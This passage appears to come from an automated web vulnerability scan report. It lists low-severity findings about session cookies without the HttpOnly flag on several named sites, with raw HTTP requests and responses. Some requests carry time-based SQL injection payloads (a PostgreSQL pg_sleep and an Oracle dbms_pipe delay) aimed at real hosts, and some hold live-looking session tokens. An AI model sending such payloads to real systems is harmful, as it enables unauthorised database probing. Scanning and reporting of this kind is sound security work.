GET /billing_view/billingview.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Object moved
Date: Fri, 06 May 2011 17:35:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: login.asp
Content-Length: 130
Content-Type: text/html
Set-Cookie: HinghamLoginError=Please+fill+in+all+values; path=/billing_view
Set-Cookie: ASPSESSIONIDSQCDDDAA=IOHJKIBCIBHNDHNJLCHNDMHE; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="login.asp">here</a>.</body>
18.6. http://learn.bridgefront.com/sendpassword  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://learn.bridgefront.com
Path:   /sendpassword

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sendpassword?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3 HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 06 May 2011 21:59:01 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=3930551D31EF952CCD99919CCE5FF629; Path=/
Content-Length: 6430
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head><title>Application Error </title>

<script language="JavaScript" type="text/JavaScript">

   function showdiv2(param)
   {
    if(param=="show")
    {
    document.all.div1.style.visi
...[SNIP]...
18.7. http://login.vindicosuite.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://login.vindicosuite.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Referer: http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login.vindicosuite.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2262
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSSSCTDAT=ALNPJKACIDHPPEIGPANPDPFM; path=/
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:30:14 GMT


<html>

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
   <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
   
   <link rel="stylesheet" type="text/css" hre
...[SNIP]...
18.8. http://login.vindicosuite.com/AccountManager/ResetPassword/Exec_Reset.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://login.vindicosuite.com
Path:   /AccountManager/ResetPassword/Exec_Reset.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AccountManager/ResetPassword/Exec_Reset.asp HTTP/1.1
Host: login.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 172
Content-Type: text/html
Location: index.asp?message=Invalid%20Username%20/%20Password
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSSSCTDAT=BNMPJKACBHICJHJNBOKOJFND; path=/
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:19:36 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="index.asp?message=Invalid%20Username%20/%20Password">here</a>.</body>
18.9. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://login.vindicosuite.com
Path:   /AccountManager/ResetPassword/index.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AccountManager/ResetPassword/index.asp?message=Invalid%20Username%20/%20Password HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login.vindicosuite.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 3660
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSSSCTDAT=NBNPJKACJICNIHMECCFHHNJE; path=/
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:20:51 GMT


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<!--
edited by Tim Whidden Today is 1/13/11. It is now 9:23 AM
-->
<head>
   <title>Password Reset</title>
   
   <script type="text
...[SNIP]...
18.10. http://login.vindicosuite.com/default.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://login.vindicosuite.com
Path:   /default.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /default.asp?message=Invalid%20Username%20and%20or%20Password HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login.vindicosuite.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2294
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSSSCTDAT=CFNPJKACEMAOIDJLNKLBPOEL; path=/
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:21:27 GMT


<html>

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
   <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
   
   <link rel="stylesheet" type="text/css" hre
...[SNIP]...
18.11. http://login.vindicosuite.com/vindico_dynamic.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://login.vindicosuite.com
Path:   /vindico_dynamic.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /vindico_dynamic.asp HTTP/1.1
Referer: http://login.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login.vindicosuite.com
Accept-Encoding: gzip, deflate
Content-Length: 220

password=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+
...[SNIP]...

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 182
Content-Type: text/html
Location: /default.asp?message=Invalid%20Username%20and%20or%20Password
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSSSCTDAT=EONPJKACNHPHPKBJJGJNOKJO; path=/
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:34:16 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/default.asp?message=Invalid%20Username%20and%20or%20Password">here</a>.</body>
18.12. http://poll.websitegear.com/compactpoll.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://poll.websitegear.com
Path:   /compactpoll.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /compactpoll.asp?pollID=18420 HTTP/1.1
Host: poll.websitegear.com
Proxy-Connection: keep-alive
Referer: http://www.scout.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 20:44:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 5310
Content-Type: text/html; Charset=utf-8
Set-Cookie: ASPSESSIONIDQQASAQQQ=OBHLEJBCCNPCEHGMOGOCPGDF; path=/
Cache-control: private


function showVote18420(){
var valSelected = false; var voteForm18420 = document.getElementById('WGPoll18420');
var options = document.getElementsByName
...[SNIP]...
18.13. http://poll.websitegear.com/compactpoll.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://poll.websitegear.com
Path:   /compactpoll.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /compactpoll.asp?pollID=18420 HTTP/1.1
Host: poll.websitegear.com
Proxy-Connection: keep-alive
Referer: http://www.scout.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:30:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 5310
Content-Type: text/html; Charset=utf-8
Set-Cookie: ASPSESSIONIDSACSQBTS=BCHAMOBCMMIPKJJCLMLBENKA; path=/
Cache-control: private


function showVote18420(){
var valSelected = false; var voteForm18420 = document.getElementById('WGPoll18420');
var options = document.getElementsByName
...[SNIP]...
18.14. http://sales.liveperson.net/visitor/addons/deploy.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy.asp?site=56727252&d_id=software-soa HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.dynamicperimeter.com/download/Intel_Expressway_Tokenization_Broker/?partnerref=googletokenization&gclid=CMLLqMvV1KgCFUSo4AodlBcAgw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16601209214853,d=1303177644; _mkto_trk=id:220-ESA-932&token:_mch-liveperson.net-1304643823223-44198

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:21:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Fri, 06 May 2011 10:18:53 GMT
Content-Length: 9902
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDSQBBBCQB=BGNFLBFBIBAHFOFDONLBKAJH; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 56727252
lpAddMonitorTag();
//DO NOT CHANGE THE BELOW COMMENT
//PLUGINS_LIST=globalUtils
if (typeof(lpMTagConfig.plugins)=='undefined') { lpMTagConfig.plugins = {};}

lpMTagCo
...[SNIP]...
18.15. https://secure.opinionlab.com/ccc01/comment_card.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.opinionlab.com
Path:   /ccc01/comment_card.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccc01/comment_card.asp?time1=1304753251678&time2=1304754493643&prev=http%3A%2F%2Fburp%2Fshow%2F19&referer=http%3A%2F%2Fwww%2Eexpedia%2Ecom%2FHTX%5FFLTFLEX%5FCALENDAR%2Ehtml&height=1200&width=1920&custom_var=80312807C795402E93C5016D2A2A3E1B| HTTP/1.1
Host: secure.opinionlab.com
Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=&mnth=5/1/2011&rgst=1&rged=10&fxst=0&load=1&cAdu=1&rfrr=-429
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 07 May 2011 02:48:21 GMT
Content-Type: text/html; Charset=UTF-8
Cool01: Opinionlab - Cool01
Set-Cookie: ASPSESSIONIDQCRBQCAC=NDNBDONBCBPKEFFJPEOEPEHB; path=/
Vary: Accept-Encoding
Content-Length: 8271

<!--TEMPLATE version 3.6 UNIVERSAL CSS: 0 ...--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<title>Comment
...[SNIP]...
18.16. https://secure.trust-guard.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.trust-guard.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Referer: https://secure.trust-guard.com/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: secure.trust-guard.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:58:13 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: PHPSESSID=a0np6gkb2vcuhnhijhucu86910; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
18.17. https://secure.trust-guard.com/ResetPassword.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.trust-guard.com
Path:   /ResetPassword.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ResetPassword.php HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303758698.2

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:01:18 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: PHPSESSID=523ir1s45tqff5eslbctb6ta86; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 3716
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
18.18. https://secure.trust-guard.com/index.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.trust-guard.com
Path:   /index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: secure.trust-guard.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:54:04 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: PHPSESSID=uh9nm4eto59nfd5fii6haostd4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
18.19. http://support.expedia.com/app/answers/list/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://support.expedia.com
Path:   /app/answers/list/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/answers/list/ HTTP/1.1
Host: support.expedia.com
Proxy-Connection: keep-alive
Referer: http://support.expedia.com/app/home/uurl/http%3A%2F%2Fwww.expedia.com%2Fpub%2Fagent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429%3F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; s1=`user=v.8,0,EX01528414FE$F4$B5202000X$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$EDIs$A8$FB$27$95$E4$82$AB$89$FB!e02000`131; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819496`188; cp_session=UylSJgVxACRUPAJyAGoEaQRCDBEAA1FsA3EJOlZ2AngBcwR4ACYFPAF7WS1QIlIhACADPQd2VW4AJgM5ASBUdARyXyIBMAUSBHEIMwZEBCJTYFJCBXUAcVRxAn4ANgR9BHAMOwAxUWwDZAl%2FVjcCOwE8BCgANgVAAXBZelA1UnEAYAMXBzVVMwBhAz8BIFQuBGZfawFvBXYEZwhHBnMEdFMxUnYFJwA1VEICNgA%2FBGAEeAx7AGdRMwN2CSRWNgI5AXQEPgBABTcBJVk9UGFSNwA7AyUHLVVxADcDFQEVVFUEUV8iATEFZQQ3CGgGdgRjU3dSNwVGAEJUUgIHAHYENwQ2DDoANFFxA2AJYFZxAmcBFQQoADYFMAFtWWFQI1I8AHcDYgcQVWEAIQNjARJUMQQnXzUBRQVhBGQIMAYzBCJTYFIyBXAAYVR1AiQAdgQ2BEQMbwBwUTcDMwkjVjMCMQE1BCgANwVCATFZP1ByUmYAZAM3ByxVJwBwA3QBZ1REBDJfIgExBWUEOAhuBmMEY1N3UjcFRgA3VCMCYgBlBGYEQQw6ACBRIAM2CRVWZQJxAWMEOwB2BWABcll9UHJSZwAWA3wHYFVmAD0DdAFnVEYEIF96AS8FcQQxCCMGOAQlUw5SKwVxAGNUdQIjADoEagRuDAIAelFJAzYJH1YkAg4BEgQ1ADEFZAFFWUVQB1ICAD8DPQdkVTUAcwNsAWlUIgR%2F; supportsurvey=1; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3DundefinedtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%2526function%2520%2528%2529%257Bvar%2520a%253D%255B%2522%257B%2522%255D%252Cb%252Ck%252Cv%253Bfunction%2520p%2528s%2529%257Bif%2528b%2529%257Ba.push%2528%2522%252C%2522%2529%253B%257D%250Aa.push%2528k.toJSONString%2528%2529%252C%2522%253A%2522%252Cs%2529%253Bb%253Dtrue%253B%257D%250Afor%2528k%2520in%2520this%2529%257Bif%2528this.hasOwnProperty%2528k%2529%2529%257Bv%253Dthis%255Bk%255D%253Bswitch%2528typeof%2520v%2529%257Bcase%2522object%2522%253Aif%2528v%2529%257Bif%2528typeof%2520v.toJSONString%253D%253D%253D%2522function%2522%2529%257Bp%2528v.toJSONString%2528%2529%2529%253B%257D%257Delse%257Bp%2528%2522null%2522%2529%253B%257D%250Abreak%253Bcase%2522string%2522%253Acase%2522number%2522%253Acase%2522boolean%2522%253Ap%2528v.toJSONString%2528%2529%2529%253B%257D%257D%257D%250Aa.push%2528%2522%257D%2522%2529%253Breturn%2520a.join%2528%2522%2522%2529%253B%257D%253DtoJSONString%3B

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:40:25 GMT
Server: Apache
P3P: policyref="http://support.expedia.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=AnhUIAB0BSEDa1cnBW8Gaw9JVktdXlVoB3UOPVBwVC5VJwF9UHYAOVctA3cCcAh7AyMFO1IjBzxSdFVvU3JXd1MlCXQFNAYRViMEP1UXACYCMVREAHAFdAMmVysFMwZ%2FD3tWYV1sVWgHYA54UDFUbVVoAS1QZgBFVyYDIAJnCCsDYwURUmAHYVIzVWlTclctUzEJPQVrBnVWNQRLVSAAcAJgVHAAIgUwAxVXYwU6BmIPc1YhXTpVNwdyDiNQMFRvVSABO1AQADJXcwNnAjMIbQM4BSNSeAcjUmVVQ1NHV1ZTBgl0BTUGZlZlBGRVJQBnAiZUMQBDBUcDBVdSBXMGNQ89VmBdaVV1B2QOZ1B3VDFVQQEtUGYANVc7AzsCcQhmA3QFZFJFBzNSc1U1U0BXMlNwCWMFQQZiVjYEPFVgACYCMVQ0AHUFZAMiV3EFcwY0D09WNV0tVTMHNw4kUDVUZ1VhAS1QZwBHV2cDZQIgCDwDZwUxUnkHdVIiVSJTNVdHU2UJdAU1BmZWagRiVTAAZwImVDEAQwUyA3RXNwVgBmQPSlZgXX1VJAcyDhJQY1QnVTcBPlAmAGVXJAMnAiAIPQMVBXpSNQc0Um9VIlM1V0VTdwksBSsGclZjBC9VawAhAl9ULQB0BWYDIld2BT8GaA9lVlhdJ1VNBzIOGFAiVFhVRgEwUGEAYVcTAx8CVQhYAzwFO1IxB2dSIVU6UztXIVMo; path=/
RNT-Time: D=1438358 t=1304721625654912
RNT-Machine: 02
Vary: Accept-Encoding
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 95305


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:rn="http://schemas.rightn
...[SNIP]...
18.20. http://support.expedia.com/app/home/uurl/http%3A%2F%2Fwww.expedia.com%2Fpub%2Fagent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429%3F  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://support.expedia.com
Path:   /app/home/uurl/http%3A%2F%2Fwww.expedia.com%2Fpub%2Fagent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429%3F

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/home/uurl/http%3A%2F%2Fwww.expedia.com%2Fpub%2Fagent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429%3F HTTP/1.1
Host: support.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=&mnth=5/1/2011&rgst=1&rged=10&fxst=0&load=1&cAdu=1&rfrr=-429
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
